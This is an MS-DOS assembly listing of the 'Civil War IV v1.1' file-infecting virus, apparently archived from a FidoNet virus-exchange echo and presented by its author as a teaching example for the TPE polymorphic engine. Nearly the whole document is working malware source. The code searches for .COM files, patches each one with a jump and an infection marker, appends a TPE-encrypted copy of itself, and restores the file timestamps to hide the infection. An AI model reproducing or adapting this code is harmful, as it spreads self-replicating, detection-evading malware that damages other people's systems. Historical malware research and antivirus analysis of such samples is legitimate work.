MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.vir36.asm

;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg  : 26 of 54
; From : MeteO                               2:5030/136      Tue 09 Nov 93 09:13
; To   : -  *.*  -                                           Fri 11 Nov 94 08:10
; Subj : CIVIL411.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Dr T , 2:283/718 (06 Nov 94 16:48)
;* To   : Mike Nisbett
;* Subj : CIVIL411.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Dr.T.@f718.n283.z2.fidonet.org
;****************************************************************************
;*   Civil War IV v1.1 (minor bugfix version)                   *
;*                                          *
;*   Assembled with Tasm 2.5                            *
;*                                          *
;*   (c) 08-01-93 Dark Helmet, The Netherlands.                 *
;*   The author takes no responsibilty for any damages caused by the virus  *
;*                                          *
;*   This is a example virus with the TPE engine to teach you how to use    *
;*   the TPE engine.                                *
;*                                      *
;*--------------------------------------------------------------------------*
;*                                      *
;* Notes:                                   *
;*                                      *
;* This virus is NOT dedicated to Sara Gordon, but to all the innocent      *
;* people who are killed in Yugoslavia.                     *
;*                                      *
;* The text in the virus is taken from the song Civil War (hence the name)  *
;* by Guns and Roses, Use Your Illusion II, we hope they don't mind it.     *
;*                                      *
;* The first name for the virus was NAVIGATOR II, because the virus is      *
;* based on the NAVIGATOR virus (also written by me, a while back), but     *
;* since I decided to put the songtext in it I renamed it to Civil War IV   *
;*                                      *
;* You need the TPE 1.3 engine to link this program.                *    *
;*                                      *
;****************************************************************************

        .model tiny
        .radix 16
        .code

        extrn   rnd_init:near
        extrn   rnd_get:near
        extrn   crypt:near
        extrn   tpe_top:near

        org 100h

len     equ offset tpe_top - begin

Dummy:          db 0e9h, 03h, 00h, 44h, 48h, 00h

Begin:          call virus          ; calculate delta offset

Virus:          pop bp
                sub bp,offset virus

                mov dx,0fe00h           ; DTA instellen
                mov ah,1ah
                int 21h

Restore_begin:  call rnd_init           ; init random generator
        mov di,0100h
        lea si,ds:[buffer+bp]
        mov cx,06h
        rep movsb

First:      lea dx,[com_mask+bp]        ;get first COM file
        mov ah,04eh
        xor cx,cx
        int 21h

Open_file:  mov ax,03d02h           ;open for READ/WRITE
        mov dx,0fe1eh
        int 21h
        mov [handle+bp],ax
        xchg ax,bx

Read_date:  mov ax,05700h           ;store date/time for later
        int 21h             ;use
        mov [date+bp],dx
        mov [time+bp],cx

Check_infect:   mov bx,[handle+bp]      ;check if initials present in
        mov ah,03fh         ;file
        mov cx,06h
        lea dx,[buffer+bp]
        int 21h

                mov al,byte ptr [buffer+bp]+3   ;Compare initials
        mov ah,byte ptr [buffer+bp]+4
        cmp ax,[initials+bp]
        jne infect_file         ;if initials not present
                        ;start infecting file

Close_file:     mov bx,[handle+bp]      ;close file
        mov ah,3eh
        int 21h

Next_file:      mov ah,4fh          ;get next COM file
        int 21h             ;in directorie
        jnb open_file
        jmp exit

Infect_file:    mov ax,word ptr [cs:0fe1ah] ;get lenght of file
        sub ax,03h
        mov [lenght+bp],ax
        mov ax,04200h           ;goto begin of file
        call move_pointer

Write_jump:     mov ah,40h          ;Write JUMP intruction
        mov cx,01h
        lea dx,[jump+bp]
        int 21h

        mov ah,40h          ;Write JUMP offset
        mov cx,02h
        lea dx,[lenght+bp]
        int 21h

        mov ah,40           ;Write initials to check
        mov cx,02h          ;for infection later
        lea dx,[initials+bp]
        int 21h

        mov  ax,4202h           ; move to end of file
        call move_pointer       ; for infection

;*****************************************************************************
;                   T P E                        *
;*****************************************************************************

Encrypt:    push bp             ; BP = delta offset
                        ; push delta offset on stack
                        ; for later use.

        mov ax,cs           ; Calculate worksegment
        add ax,01000h
        mov es,ax           ; ES point to decrypt virus

        lea dx,[begin+bp]       ; DS:DX begin encryption

        mov cx,len          ; virus lenght

        mov bp,[lenght+bp]      ; decryption starts at this
        add bp,103h         ; point

        xor si,si           ; distance between decryptor
                        ; and encrypted code is 0 bytes

        call rnd_get            ; AX = random value
        call crypt          ; encrypt virus

        pop bp              ; BP = delta offset
                        ; get delta offset of stack

;******************************************************************************
;               T P E - E N D                     *
;******************************************************************************

Write_virus:    mov bx,[handle+bp]
        mov ah,40h
        int 21h

Restore_date:   mov ax,05701h
        mov bx,[handle+bp]
        mov cx,[time+bp]
        mov dx,[date+bp]
        int 21h

Exit:       mov ax,cs
        mov ds,ax
        mov es,ax
        mov bx,0100h            ; jump to start program
        jmp bx

;----------------------------------------------------------------------------

move_pointer:   mov bx,[handle+bp]
        xor cx,cx
        xor dx,dx
        int 21h
        ret

;----------------------------------------------------------------------------
v_name      db "Civil War IV v1.1, (c) Jan '93 "
com_mask    db "*.com",0
handle      dw ?
date        dw ?
time        dw ?
buffer          db 090h,0cdh,020h,044h,048h,00h
initials        dw 4844h
lenght      dw ?
jump            db 0e9h,0
message     db "For all i've seen has changed my mind"
        db "But still the wars go on as the years go by"
        db "With no love of God or human rights"
        db "'Cause all these dreams are swept aside"
        db "By bloody hands of the hypnotized"
        db "Who carry the cross of homicide"
        db "And history bears the scars of our Civil Wars."
writer      db "[ DH / TridenT ]",00

        end  dummy

;-+-  PPoint 1.86
; + Origin: - = [ Brainstorm BBS ++31 (0)20-6108189 ] = - (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
;    þ The MeÂeO
;
;/yx           Extended memory swapping
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)